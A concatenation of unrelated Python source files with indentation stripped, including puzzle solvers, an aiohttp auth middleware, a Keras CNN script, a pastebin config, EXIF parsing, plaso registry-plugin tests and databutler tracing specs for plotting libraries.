while num_start_tries < 50:
agent_state.position = self.sim.pathfinder.get_random_navigable_point()
num_start_tries += 1
agent.set_state(agent_state)
|
#! /usr/bin/env python3
from memo import memoize
import sys
description = '''
Path sum: four ways
Problem 83
NOTE: This problem is a significantly more challenging version of Problem 81.
In the 5 by 5 matrix below, the minimal path sum from the top left to the bottom right, by moving left, right, up, and down, is indicated in bold red and is equal to 2297.
131 673 234 103 18
201 96 342 965 150
630 803 746 422 111
537 699 497 121 956
805 732 524 37 331
Find the minimal path sum, in matrix.txt (right click and 'Save Link/Target As...'), a 31K text file containing a 80 by 80 matrix, from the top left to the bottom right by moving left, right, up, and down.
'''
sys.setrecursionlimit(10000)
with open('matrix-83.txt', 'r') as f:
matrix = [[int(x) for x in line.strip().split(',')] for line in f]
def minPathFromStart(matrix):
N = len(matrix)
minPathTo = [[sum(matrix[0][:j+1]) + sum(matrix[k][j] for k in range(0,i+1)) for j in range(0, N)] for i in range(0, N)]
def search(i, j, soFar):
if soFar + matrix[i][j] <= minPathTo[i][j]:
minPathTo[i][j] = soFar + matrix[i][j]
if i > 0:
search(i-1, j, minPathTo[i][j])
if i < N - 1:
search(i+1, j, minPathTo[i][j])
if j < N - 1:
search(i, j+1, minPathTo[i][j])
if j > 0:
search(i, j-1, minPathTo[i][j])
search(0, 0, 0)
return minPathTo[-1][-1]
test = [
[131, 673, 234, 103, 18],
[201, 96, 342, 965, 150],
[630, 803, 746, 422, 111],
[537, 699, 497, 121, 956],
[805, 732, 524, 37, 331]]
print(minPathFromStart(test))
print(minPathFromStart(matrix))
|
import os
from collections import defaultdict
def part1(lines):
coords = set()
max_r = max_c = 0
for line in lines:
r, c = map(int, line.split(", "))
coords.add((r, c))
max_r = max(max_r, r)
max_c = max(max_c, c)
coord_id_to_point = {coord_id: point for coord_id, point in enumerate(coords, start=1)}
region_sizes = defaultdict(int)
infinite_ids = set()
for i in range(max_r + 1):
for j in range(max_c + 1):
min_dists = sorted([(abs(r - i) + abs(c - j), coord_id) for coord_id, (r, c) in coord_id_to_point.items()])
if len(min_dists) == 1 or min_dists[0][0] != min_dists[1][0]:
coord_id = min_dists[0][1]
region_sizes[coord_id] += 1
if i == 0 or i == max_r or j == 0 or j == max_c:
infinite_ids.add(coord_id)
return max(size for coord_id, size in region_sizes.items() if coord_id not in infinite_ids)
def part2(lines, manhattan_limit=10000):
coords = set()
max_r = max_c = 0
for line in lines:
r, c = map(int, line.split(", "))
coords.add((r, c))
max_r = max(max_r, r)
max_c = max(max_c, c)
size_shared_region = 0
for i in range(max_r + 1):
for j in range(max_c + 1):
size_shared_region += int(sum(abs(r - i) + abs(c - j) for r, c in coords) < manhattan_limit)
return size_shared_region
lines = [line.strip() for line in open("./input", "r").readlines()]
print(part1(lines))
print(part2(lines))
|
# pylint: disable=C0103
from CounterFit.sensors import *
from CounterFit.serial_sensors import *
from CounterFit.binary_sensors import *
from CounterFit.i2c_sensors import *
from CounterFit.actuators import *
__version__ = "0.1.3.dev29"
|
import datetime
import re
import time
import aiohttp
from utils.config import config
from utils.metrics import checked_tokens, tokenzer_reply
regex = re.compile("Bearer\s(\S+)")
async def verifyAuth(app, handler):
async def middleware_handler(request):
try:
if request.path == "/":
checked_tokens.inc()
header = regex.findall(request.headers.get("Authorization"))
if len(header) != 0:
start = time.perf_counter()
async with aiohttp.ClientSession(conn_timeout=2,read_timeout=2) as session:
async with session.post("http://{0}:{1}/verify".format(config["tokenzer"]["address"],config["tokenzer"]["port"]),json={"token": header[0]}) as response:
tokenzer_reply.set(time.perf_counter()- start)
if response.status == 200:
request["profile"] = await response.json()
return await handler(request)
else:
return aiohttp.web.json_response(await response.json(), status=403)
else:
return aiohttp.web.json_response({"message": "Неверный заголовок"}, status=403)
else:
return await handler(request)
except aiohttp.ClientError as error:
print({"type": "Fatal", "module": "Auth", "section": "verifyAuth", "message": error.__str__(), "date": datetime.datetime.now().isoformat("T")})
return aiohttp.web.json_response({"message": "Невозможно проверить сессию"}, status=500)
return middleware_handler
|
# -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
from matplotlib import ticker
import seaborn as sns
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Convolution2D, MaxPooling2D
from keras.layers import Activation, Dropout, Flatten, Dense
from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping
# dimensions of our images.
img_width, img_height = 50, 50
train_data_dir = 'data/symlinks/train'
validation_data_dir = 'data/symlinks/validation'
test_data_dir = 'data/symlinks/test'
nb_epoch = 20
batch_size=128
# this is the augmentation configuration we will use for training
train_datagen = ImageDataGenerator(
samplewise_center=True,
rescale=1./255,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
# this is the augmentation configuration we will use for testing:
# only rescaling
test_datagen = ImageDataGenerator(
samplewise_center=True,
rescale=1./255)
train_generator = train_datagen.flow_from_directory(
train_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size,
class_mode='binary',
follow_links=True)
validation_generator = test_datagen.flow_from_directory(
validation_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size,
class_mode='binary',
follow_links=True)
test_generator = test_datagen.flow_from_directory(
test_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size,
shuffle=False,
class_mode='binary',
follow_links=True)
def get_model():
model = Sequential()
model.add(Convolution2D(32, (3, 3), input_shape=(img_width, img_height, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Convolution2D(32, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Convolution2D(64, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(64))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(1))
model.add(Activation('sigmoid'))
return model
model = get_model()
## Callback for loss logging per epoch
class LossHistory(Callback):
def on_train_begin(self, logs={}):
self.losses = []
self.val_losses = []
def on_epoch_end(self, batch, logs={}):
self.losses.append(logs.get('loss'))
self.val_losses.append(logs.get('val_loss'))
history = LossHistory()
model.compile(loss='binary_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'],
verbose=1,
shuffle=True)
model.fit_generator(
train_generator,
steps_per_epoch=train_generator.samples/batch_size,
epochs=nb_epoch,
validation_data=validation_generator,
verbose=1,
validation_steps=validation_generator.samples/batch_size,
callbacks=[history])
test_loss, test_acc = model.evaluate_generator(
test_generator,
steps=test_generator.samples/batch_size)
print("test_loss: %.4f - test_acc: %.4f"%(test_loss, test_acc))
loss = history.losses
val_loss = history.val_losses
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.title('Loss Trend')
plt.plot(loss, 'blue', label='Training Loss')
plt.plot(val_loss, 'green', label='Validation Loss')
plt.xticks(range(0,nb_epoch)[0::2])
plt.legend()
plt.show()
|
# Data directory
data_directory = "./data"
# Listen address
listen_address = "0.0.0.0"
# Listen port
listen_port = 5000
# Use whitelisting
# Whitelisted IPs can view recent pastes on the home page, as well as delete pastes
# For limiting pasting to whitelisted users, enable the "restrict_pasting" option below
use_whitelist = True
# Whitelist CIDR
whitelist_cidr = ['127.0.0.1/32', '10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16']
# Blacklist CIDR
blacklist_cidr = []
# Restrict pasting functionality to whitelisted IPs
restrict_pasting = False
# Rate limit for pasting (ignored for whitelisted users)
rate_limit = "5/hour"
# Guess threshold for automatic language detection
guess_threshold = 0.20
# Number of recent pastes to show on the home page
recent_pastes = 10
# Try to use X-Real-IP or X-Forwarded-For HTTP headers
behind_proxy = False
# Default theme to display to users
default_theme = "Light"
# Purge interval (in seconds) for checking expired pastes
purge_interval = 3600
# Show recent pastes, even to non-whitelisted users (without a delete button)
force_show_recent = False
# Ignore these classifications for language detection
ignore_guess = ['TeX', 'SQL']
# Show CLI button on home page
show_cli_button = True
# Include https in the generated links instead of http
# This assumes you are behind something else doing the SSL
# termination, but want the users to see https links
#
# This is normally handled by the HTTP headers now
force_https_links = False
# This can be used to specify a different domain for generated links
#
# Note: exclude the http:// or https:// prefix, as well as anything
# following the domain (except the port, if applicable)
override_domain = ""
|
from __future__ import unicode_literals
import time
from wand.image import Image as ImageHandler
class ImageMetadata(object):
@classmethod
def image_metadata(cls, contents):
handler = ImageHandler(blob=contents)
metadata = handler.metadata
any_exif = filter(lambda x: x.startswith('exif:'), metadata.keys())
if not any_exif:
return {}
aperture = metadata.get('exif:FNumber')
if aperture is not None:
parts = aperture.split('/')
if len(parts) == 0:
aperture = '1/{0}'.format(parts[0])
else:
aperture = '1/{0}'.format(float(parts[0]) / float(parts[1]))
shutter_speed = metadata.get('exif:ExposureTime')
photographed_at = metadata.get('exif:DateTime')
if photographed_at is not None:
photographed_at = time.strftime(
'%Y-%m-%d %H:%M:%S', time.strptime(
photographed_at, '%Y:%m:%d %H:%M:%S'))
make = metadata.get('exif:Make')
model = metadata.get('exif:Model')
if make is not None and model is not None:
camera = '%s %s' % (make, model)
else:
camera = model
focal_length = metadata.get('exif:FocalLength')
if focal_length is not None:
parts = focal_length.split('/')
if len(parts) == 1:
focal_length = parts[0]
else:
focal_length = float(parts[0]) / float(parts[1])
iso = metadata.get('exif:ISOSpeedRatings')
if iso is not None:
iso = int(iso)
return {
'camera': camera,
'photographed_at': photographed_at,
'focal_length': focal_length,
'aperture': aperture,
'shutter_speed': shutter_speed,
'iso': iso,
}
|
import unittest
import os
from TestCase.test_HomePage import HomePage
from TestCase.test_AddToCartAndPayment import AddToCartAndPayment
tc1 = unittest.TestLoader().loadTestsFromTestCase(HomePage)
tc2 = unittest.TestLoader().loadTestsFromTestCase(AddToCartAndPayment)
senityTestSuites = unittest.TestSuite([tc1])
funTestSuites = unittest.TestSuite([tc2])
masertTestSuites = unittest.TestSuite([tc1, tc2])
# unittest.TextTestRunner().run(senityTestSuites)
# unittest.TextTestRunner().run(funTestSuites)
unittest.TextTestRunner(verbosity=2).run(masertTestSuites)
|
from django.apps import AppConfig
class SakilaConfig(AppConfig):
name = 'sakila'
|
# อ่านทความ https://python3.wannaphong.com/2016/08/%E0%B9%83%E0%B8%8A%E0%B9%89-gnu-octave-%E0%B8%81%E0%B8%B1%E0%B8%9A-python.html
# ใช้ GNU Octave กับ Python
import numpy as np
from oct2py import Oct2Py
oc = Oct2Py()
oc.plot([1,2,3],'-o', linewidth=2)
xx = np.arange(-2*np.pi, 2*np.pi, 0.2)
oc.surf(np.subtract.outer(np.sin(xx), np.cos(xx)))
|
from unittest import TestCase
from datetime import date
from pyperiods.period import InvalidPeriodError
from pyperiods.years import YearPeriod
class YearPeriodTest(TestCase):
def test_empty_constructor_uses_current_year(self):
current_year = date.today().year
period = YearPeriod()
self.assertEqual(period.year, current_year)
def test_constructor(self):
self.assertEqual(YearPeriod('2016').year, 2016)
self.assertEqual(YearPeriod(2016).year, 2016)
def test_sort_natural(self):
periods = [
YearPeriod('2016'),
YearPeriod('2017'),
YearPeriod('2015'),
]
periods.sort()
self.assertEqual([p.year for p in periods], [2015, 2016, 2017, ])
def test_add(self):
self.assertEqual(YearPeriod(2016) + 1, YearPeriod(2017))
def test_subtract(self):
self.assertEqual(YearPeriod(2016) - 1, YearPeriod(2015))
def test_months(self):
months_in_year = [str(m) for m in YearPeriod(2016).months]
self.assertEqual(months_in_year, ['201601','201602','201603','201604','201605','201606',
'201607','201608','201609','201610','201611','201612'])
def test_range(self):
generator = YearPeriod(2015).range(0, 3)
self.assertEqual([str(year) for year in generator], ['2015', '2016', '2017', '2018'])
def test_range_with_period(self):
generator = YearPeriod(2015).range(stop=YearPeriod(2018))
self.assertEqual([str(year) for year in generator], ['2015', '2016', '2017', '2018'])
def test_range_negative(self):
generator = YearPeriod(2015).range(-2, 2)
self.assertEqual([str(year) for year in generator], ['2013', '2014','2015', '2016', '2017'])
def test_create_from_empty_strings(self):
self.assertEqual(str(YearPeriod('')), YearPeriod())
def test_current_past_future(self):
month = YearPeriod()
self.assertTrue(month.is_current())
self.assertFalse(month.next().is_current())
self.assertTrue(month.next().is_future())
self.assertFalse(month.next().is_past())
self.assertTrue(month.previous().is_past())
self.assertFalse(month.next().is_past())
def test_invalid_years(self):
self.assertRaises(InvalidPeriodError, YearPeriod, 10000)
self.assertRaises(InvalidPeriodError, YearPeriod, 1950)
self.assertRaises(InvalidPeriodError, YearPeriod, 'ab')
|
from pyansys_cartpole.envs.cartpole_mapdl import CartPoleMapdl
from pyansys_cartpole.envs.cartpole_mapdl_simple import CartPoleMapdlSimple
from pyansys_cartpole.envs.cartpole_env import CartPoleEnv
|
from contextlib import closing
import urllib2
import base64
import os
import sys
here = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(here, "../vendored"))
from googleapiclient import discovery
from oauth2client.client import GoogleCredentials
API_URL = 'https://{api}.googleapis.com/$discovery/rest?version={apiVersion}'
DETECT_TYPES = ("LABEL_DETECTION", "TEXT_DETECTION", "SAFE_SEARCH_DETECTION",
"FACE_DETECTION", "LANDMARK_DETECTION", "LOGO_DETECTION",
"IMAGE_PROPERTIES")
credentials_path = os.path.join(here, "../google-application-credentials.json")
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = credentials_path
def get_vision_service():
credentials = GoogleCredentials.get_application_default()
return discovery.build('vision', 'v1',
credentials=credentials,
discoveryServiceUrl=API_URL)
def detect_image(image_url, detect_type="FACE_DETECTION", max_results=4):
"""Uses Google Cloud Vision API to detect an entity within an image in the
given URL.
Args:
image_url: a URL containing an image
detect_type: detection type to perform (default: facial detection)
max_results: the maximum number of entities to detect within the image
Returns:
An array of dicts with information about the entities detected within
the image.
"""
if detect_type not in DETECT_TYPES:
raise TypeError('Invalid detection type given')
if type(max_results) is not int or max_results <= 0:
raise TypeError('Maximum results must be a positive integer')
# Context manager for urllib2.urlopen requires `contextlib` library
# Source: http://stackoverflow.com/a/14849166/234233
with closing(urllib2.urlopen(image_url)) as img:
if img.headers.maintype != 'image':
raise TypeError('Invalid filetype given')
batch_request = [{
'image': {
'content': base64.b64encode(img.read()).decode('UTF-8')
},
'features': [{
'type': detect_type,
'maxResults': max_results
}]
}]
service = get_vision_service()
request = service.images().annotate(
body={
'requests': batch_request
}
)
response = request.execute()
return response
|
# https://binarysearch.com/problems/Binary-Search-Tree-Validation
class Solution:
@staticmethod
def getAll(root,lst):
if root == None:
return
lst.append(root.val)
Solution.getAll(root.left,lst)
Solution.getAll(root.right,lst)
def solve(self, root) -> bool:
if root == None:
return True
if root.left != None:
if root.left.val >= root.val:
return False
if root.left.left != None or root.left.right != None:
if not self.solve(root.left):
return False
lst = []
Solution.getAll(root.left,lst)
if not all(x<root.val for x in lst):
return False
if root.right != None:
if root.right.val <= root.val:
return False
if root.right.left != None or root.right.right != None:
if not self.solve(root.left):
return False
lst = []
Solution.getAll(root.right,lst)
if not all(x>root.val for x in lst):
return False
return True
|
import collections
import inspect
from typing import List, Union, Callable, Tuple, Any, Optional, Mapping
from databutler.pat.analysis.clock import LogicalClock
from databutler.pat.analysis.hierarchical_trace.builder_utils import TraceEventsCollector, TraceItemsCollector
from databutler.pat.analysis.hierarchical_trace.core import ObjWriteEvent, ObjReadEvent
from databutler.pat.utils import pythonutils
from databutler.utils.logging import logger
SPECS = collections.defaultdict(list)
_CLOCK: Optional[LogicalClock] = None
_TRACE_EVENTS_COLLECTOR: Optional[TraceEventsCollector] = None
_TRACE_ITEMS_COLLECTOR: Optional[TraceItemsCollector] = None
def read_write_spec(funcs: Union[Callable, List[Callable]]):
"""
The spec is associated with all the functions in `funcs`.
A spec must take as input a binding of arguments to that function, and return the names of parameters modified.
The binding itself is a mapping from parameter names to values
:param funcs:
:return:
"""
if not isinstance(funcs, list):
funcs = [funcs]
def wrapper(spec):
for f in funcs:
SPECS[f].append(spec)
return spec
return wrapper
# ------------------
# SPECS START HERE
# ------------------
@read_write_spec([
list.extend,
list.append,
list.insert,
list.reverse,
list.remove,
list.sort,
list.clear,
list.pop,
dict.pop,
dict.update,
dict.clear,
dict.popitem,
])
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
# The list (i.e. `self`) is always modified for these.
return [(binding.arguments['self'], 'write')]
# --------------
# PANDAS
# --------------
try:
import pandas as pd
except ModuleNotFoundError:
pass
else:
try:
pythonutils.load_module_complete(pd)
# Including checks to partly take care of version issues.
@read_write_spec([
*[getattr(pd.DataFrame, name) for name in ["pop", "update"] if hasattr(pd.DataFrame, name)],
*[getattr(pd.Series, name) for name in ["pop", "update"] if hasattr(pd.Series, name)],
])
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
return [(binding.arguments['self'], 'write')]
methods_with_inplace = []
for elem in [pd.DataFrame, pd.Series]:
for klass in elem.mro():
for k in dir(klass):
m = getattr(klass, k)
try:
sig = inspect.signature(m)
if 'inplace' in sig.parameters:
methods_with_inplace.append(m)
except:
pass
@read_write_spec(methods_with_inplace)
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
if binding.arguments['inplace'] is True:
return [(binding.arguments['self'], 'write')]
else:
return []
methods_with_copy = []
for elem in [pd.DataFrame, pd.Series]:
for klass in elem.mro():
for k in dir(klass):
if k.startswith("_"):
continue
m = getattr(klass, k)
try:
sig = inspect.signature(m)
if 'copy' in sig.parameters:
methods_with_copy.append(m)
except:
pass
@read_write_spec(methods_with_copy)
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
if binding.arguments['copy'] is False:
return [(binding.arguments['self'], 'write')]
else:
return []
pd_plotting_functions = [
pd.DataFrame.plot,
pd.Series.plot,
*(v for k, v in vars(pd.DataFrame.plot).items() if not k.startswith("_")),
*(v for k, v in vars(pd.Series.plot).items() if not k.startswith("_")),
*(getattr(pd.DataFrame, k) for k in ['boxplot', 'hist'] if hasattr(pd.DataFrame, k)),
*(getattr(pd.Series, k) for k in ['boxplot', 'hist'] if hasattr(pd.Series, k)),
]
try:
module = pd.plotting._core
for k in ['boxplot', 'boxplot_frame', 'boxplot_frame_groupby', 'hist_frame', 'hist_series']:
if hasattr(module, k):
pd_plotting_functions.append(getattr(module, k))
pd_plotting_functions.append(module.PlotAccessor.__call__)
except:
pass
try:
@read_write_spec(pd_plotting_functions)
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
# Mark the current figure object as read and written, in that order.
gcf = plt.gcf()
return [(gcf, 'read'), (gcf, 'write')]
except Exception as e:
logger.info("Failed to load specs for pandas plotting backend.")
logger.exception(e)
except Exception as e:
logger.info("Failed to load specs for pandas.")
logger.exception(e)
# --------------
# SKLEARN
# --------------
try:
import sklearn
except ModuleNotFoundError:
pass
else:
try:
pythonutils.load_module_complete(sklearn)
estimators = set(pythonutils.get_all_subclasses(sklearn.base.BaseEstimator))
classifiers = set(pythonutils.get_all_subclasses(sklearn.base.ClassifierMixin))
regressors = set(pythonutils.get_all_subclasses(sklearn.base.RegressorMixin))
transformers = set(pythonutils.get_all_subclasses(sklearn.base.TransformerMixin))
try:
classifiers.add(sklearn.pipeline.Pipeline)
regressors.add(sklearn.pipeline.Pipeline)
except:
pass
fit_and_fit_transform_methods = [
*(getattr(estimator, "fit") for estimator in estimators
if hasattr(estimator, "fit")),
*(getattr(estimator, "fit_transform") for estimator in estimators
if hasattr(estimator, "fit_transform")),
]
@read_write_spec(fit_and_fit_transform_methods)
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
return [(binding.arguments['self'], 'write')]
except Exception as e:
logger.info("Failed to load specs for sklearn.")
logger.exception(e)
# --------------
# Matplotlib
# --------------
try:
import matplotlib
import matplotlib.pyplot as plt
except ModuleNotFoundError:
pass
else:
try:
pythonutils.load_module_complete(matplotlib)
class RcParamsWrapper(matplotlib.RcParams):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._obj_proxy_dict = collections.defaultdict(object)
self._last_event_time = None
self._keys_set_at_last_time = set()
self._keys_get_at_last_time = set()
def __setitem__(self, key, value):
if _CLOCK is not None and _TRACE_ITEMS_COLLECTOR is not None:
cur_item = _TRACE_ITEMS_COLLECTOR.get_last_in_progress_item()
if cur_item is not None:
time = _CLOCK.get_time()
if self._last_event_time != time:
self._last_event_time = time
self._keys_get_at_last_time.clear()
self._keys_set_at_last_time.clear()
if key not in self._keys_set_at_last_time:
obj_id = id(self._obj_proxy_dict[key])
event = ObjWriteEvent(
timestamp=_CLOCK.get_time(),
owner=cur_item,
ast_node=cur_item.ast_node,
obj_id=obj_id,
)
_TRACE_EVENTS_COLLECTOR.add_event(event)
self._keys_set_at_last_time.add(key)
return super().__setitem__(key, value)
def __getitem__(self, key):
if _TRACE_ITEMS_COLLECTOR is not None:
cur_item = _TRACE_ITEMS_COLLECTOR.get_last_in_progress_item()
if cur_item is not None:
time = _CLOCK.get_time()
if self._last_event_time != time:
self._last_event_time = time
self._keys_get_at_last_time.clear()
self._keys_set_at_last_time.clear()
if key not in self._keys_get_at_last_time:
obj_id = id(self._obj_proxy_dict[key])
event = ObjReadEvent(
timestamp=_CLOCK.get_time(),
owner=cur_item,
ast_node=cur_item.ast_node,
obj_id=obj_id,
)
_TRACE_EVENTS_COLLECTOR.add_event(event)
self._keys_get_at_last_time.add(key)
return super().__getitem__(key)
rc_params_wrapped = RcParamsWrapper(plt.rcParams)
matplotlib.rcParams = rc_params_wrapped
plt.rcParams = rc_params_wrapped
plt_functions = [
getattr(plt, k, None) for k in dir(plt)
if inspect.isroutine(getattr(plt, k, None)) and k != 'show' and k != 'figure'
]
@read_write_spec(plt_functions)
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
# Mark the current figure object as read and written, in that order.
gcf = plt.gcf()
return [(gcf, 'read'), (gcf, 'write')]
@read_write_spec([plt.figure])
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
return [(ret_val, 'read'), (ret_val, 'write')]
figure_methods = []
for k in dir(plt.Figure):
if k.startswith("_") or k.startswith("get_"):
continue
m = getattr(plt.Figure, k)
try:
sig = inspect.signature(m)
figure_methods.append(m)
except:
pass
@read_write_spec(figure_methods)
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
fig = binding.arguments['self']
return [(fig, 'read'), (fig, 'write')]
subclasses = pythonutils.get_all_subclasses(matplotlib.artist.Artist)
klass_access_subplot = next(k for k in subclasses if k.__name__.endswith("AxesSubplot"))
subplot_functions = [
v
for klass in klass_access_subplot.mro()
for k, v in klass.__dict__.items() if inspect.isroutine(v)
]
@read_write_spec(subplot_functions)
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
# We mark the figure object as read and written, in that order.
fig = binding.arguments['self'].figure
return [(fig, 'read'), (fig, 'write')]
try:
import seaborn as sns
pythonutils.load_module_complete(sns)
plotting_modules = [
'seaborn.categorical',
'seaborn.distributions',
'seaborn.relational',
'seaborn.regression',
'seaborn.axisgrid',
'seaborn.matrix'
]
themeing_modules = [
'seaborn.rcmod'
]
seaborn_functions = [
getattr(sns, k, None) for k in dir(sns) if inspect.isroutine(getattr(sns, k, None))
]
seaborn_plotting_functions = [f for f in seaborn_functions
if (not hasattr(f, "__module__")) or f.__module__ in plotting_modules]
seaborn_themeing_functions = [f for f in seaborn_functions
if (not hasattr(f, "__module__")) or f.__module__ in themeing_modules]
@read_write_spec(seaborn_plotting_functions)
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
# Mark the current figure object as read and written, in that order.
gcf = plt.gcf()
return [(gcf, 'read'), (gcf, 'write')]
grid_subclasses = pythonutils.get_all_subclasses(sns.axisgrid.Grid)
grid_functions = {
v
for par_klass in grid_subclasses
for klass in par_klass.mro()
for k, v in klass.__dict__.items() if inspect.isroutine(v)
}
@read_write_spec(list(grid_functions))
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
try:
fig = binding.arguments['self'].fig
return [(fig, 'read'), (fig, 'write')]
except:
return []
except Exception as e:
logger.info("Failed to load specs for seaborn.")
logger.exception(e)
except Exception as e:
logger.info("Failed to load specs for matplotlib.")
logger.exception(e)
# --------------
# Seaborn
# --------------
try:
import plotly
except ModuleNotFoundError:
pass
else:
try:
pythonutils.load_module_complete(plotly)
candidate_fig_creators = [plotly.graph_objs.Figure]
# Cover plotly.express functions that create a figure object
for name in dir(plotly.express):
if not name.startswith("_"):
value = getattr(plotly.express, name)
if inspect.isroutine(value):
candidate_fig_creators.append(value)
@read_write_spec(candidate_fig_creators)
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
try:
if isinstance(ret_val, plotly.graph_objs.Figure):
return [(ret_val, 'write')]
except:
pass
return []
# Cover Figure methods that should update the figure
klass = plotly.graph_objs.Figure
fig_methods = {name: getattr(klass, name) for name in dir(klass)
if (not name.startswith("_")) and inspect.isroutine(getattr(klass, name))}
fig_upd_methods = [func for name, func in fig_methods.items()
if any(i in name for i in {'add_', 'update', 'append', 'set_'})]
@read_write_spec(fig_upd_methods)
def spec(binding: inspect.BoundArguments, ret_val: Any) -> List[Tuple[Any, str]]:
try:
self_ = binding.arguments['self']
return [(self_, 'read'), (self_, 'write')]
except:
pass
return []
except Exception as e:
logger.info("Failed to load specs for plotly")
logger.exception(e)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the MSIE typed URLs Windows Registry plugin."""
import unittest
from plaso.formatters import winreg as _ # pylint: disable=unused-import
from plaso.lib import timelib
from plaso.parsers.winreg_plugins import typedurls
from tests.parsers.winreg_plugins import test_lib
__author__ = 'David Nides (david.nides@gmail.com)'
class MsieTypedURLsPluginTest(test_lib.RegistryPluginTestCase):
"""Tests for the MSIE typed URLs Windows Registry plugin."""
def setUp(self):
"""Sets up the needed objects used throughout the test."""
self._plugin = typedurls.TypedURLsPlugin()
def testProcess(self):
"""Tests the Process function."""
test_file_entry = self._GetTestFileEntryFromPath([u'NTUSER-WIN7.DAT'])
key_path = u'\\Software\\Microsoft\\Internet Explorer\\TypedURLs'
winreg_key = self._GetKeyFromFileEntry(test_file_entry, key_path)
event_queue_consumer = self._ParseKeyWithPlugin(
self._plugin, winreg_key, file_entry=test_file_entry)
event_objects = self._GetEventObjectsFromQueue(event_queue_consumer)
self.assertEqual(len(event_objects), 13)
event_object = event_objects[0]
self.assertEqual(event_object.pathspec, test_file_entry.path_spec)
# This should just be the plugin name, as we're invoking it directly,
# and not through the parser.
self.assertEqual(event_object.parser, self._plugin.plugin_name)
expected_timestamp = timelib.Timestamp.CopyFromString(
u'2012-03-12 21:23:53.307749')
self.assertEqual(event_object.timestamp, expected_timestamp)
regvalue_identifier = u'url1'
expected_value = u'http://cnn.com/'
self._TestRegvalue(event_object, regvalue_identifier, expected_value)
expected_string = u'[{0:s}] {1:s}: {2:s}'.format(
key_path, regvalue_identifier, expected_value)
self._TestGetMessageStrings(event_object, expected_string, expected_string)
class TypedPathsPluginTest(test_lib.RegistryPluginTestCase):
"""Tests for the typed paths Windows Registry plugin."""
def setUp(self):
"""Sets up the needed objects used throughout the test."""
self._plugin = typedurls.TypedURLsPlugin()
def testProcess(self):
"""Tests the Process function."""
test_file_entry = self._GetTestFileEntryFromPath([u'NTUSER-WIN7.DAT'])
key_path = (
u'\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths')
winreg_key = self._GetKeyFromFileEntry(test_file_entry, key_path)
event_queue_consumer = self._ParseKeyWithPlugin(
self._plugin, winreg_key, file_entry=test_file_entry)
event_objects = self._GetEventObjectsFromQueue(event_queue_consumer)
self.assertEqual(len(event_objects), 1)
event_object = event_objects[0]
self.assertEqual(event_object.pathspec, test_file_entry.path_spec)
# This should just be the plugin name, as we're invoking it directly,
# and not through the parser.
self.assertEqual(event_object.parser, self._plugin.plugin_name)
expected_timestamp = timelib.Timestamp.CopyFromString(
u'2010-11-10 07:58:15.811625')
self.assertEqual(event_object.timestamp, expected_timestamp)
regvalue_identifier = u'url1'
expected_value = u'\\\\controller'
self._TestRegvalue(event_object, regvalue_identifier, expected_value)
expected_msg = u'[{0:s}] {1:s}: {2:s}'.format(
key_path, regvalue_identifier, expected_value)
expected_msg_short = u'[{0:s}] {1:s}: \\\\cont...'.format(
key_path, regvalue_identifier)
self._TestGetMessageStrings(event_object, expected_msg, expected_msg_short)
if __name__ == '__main__':
unittest.main()
|
import numpy as np
from category_encoders import HashingEncoder
from featuretools.primitives.base.transform_primitive_base import (
TransformPrimitive
)
from featuretools.variable_types import Categorical, Numeric
class HashingEnc(TransformPrimitive):
"""Applies a Hashing Encoder to the values.
Parameters:
fitted_encoder: encoder
Encoder with the same hash_method as you wish to use here
Examples:
>>> enc = Encoder(method='Hashing')
>>> enc.fit_transform(feature_matrix, features)
>>> encoder = HashingEnc(fitted_encoder=enc, category='product_id')
>>> encoded = encoder(['car', 'toothpaste', 'coke zero', 'coke zero'])
[[0, 0, 0, 0],
[1, 0, 0, 0],
[0, 0, 0, 0],
[0, 1, 0, 0],
[0, 0, 1, 1],
[0, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 0, 0]]
"""
name = "hashing_enc"
input_types = [Categorical]
return_type = [Numeric]
def __init__(self, fitted_encoder):
self.hash_method = fitted_encoder.get_hash_method()
self.n = fitted_encoder.get_n_components()
self.number_output_features = self.n
def get_function(self):
def transform(X):
new_encoder = HashingEncoder(hash_method=self.hash_method, n_components=self.n)
return np.swapaxes(new_encoder.fit_transform(X).values, 0, 1)
return transform
def generate_name(self, base_feature_names):
return u"%s_%s" % (base_feature_names[0].upper(), 'hashing')
|
# Copyright (c) Facebook, Inc. and its affiliates.
